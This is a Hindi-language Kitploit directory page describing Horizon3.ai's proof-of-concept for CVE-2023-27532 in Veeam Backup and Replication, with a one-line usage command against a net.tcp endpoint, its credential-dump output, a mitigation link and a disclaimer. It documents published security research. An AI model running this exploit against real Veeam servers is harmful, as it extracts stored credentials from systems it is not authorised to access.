Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27532 — Veeam Backup and Replication CVE-2023-27532 के लिए POC | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2023-27532
भेद्यता विश्लेषणशोषणएपीआई सुरक्षा परीक्षणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhorizon3ai/cve-2023-27532

CVE-2023-27532

Veeam Backup and Replication CVE-2023-27532 के लिए POC

रिपॉजिटरी देखें
74113 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27532

Veeam Backup and Replication को प्रभावित करने वाले CVE-2023-27532 के लिए POC

तकनीकी विश्लेषण

इस कमजोरी का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive

सारांश

यह POC क्रेडेंशियल निकालने के लिए एक असुरक्षित API एंडपॉइंट का दुरुपयोग करता है।

उपयोग

root@kitploit:~
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password 
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  

शमन उपाय

नवीनतम संस्करण में अपडेट करें या Veeam सलाहकार के निर्देशों का पालन करके शमन करें

  • https://www.veeam.com/kb4424

नवीनतम सुरक्षा अनुसंधान के लिए Horizon3.ai Attack Team को Twitter पर फॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत किए गए मामलों को छोड़कर सिस्टम पर हमला करने के लिए उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें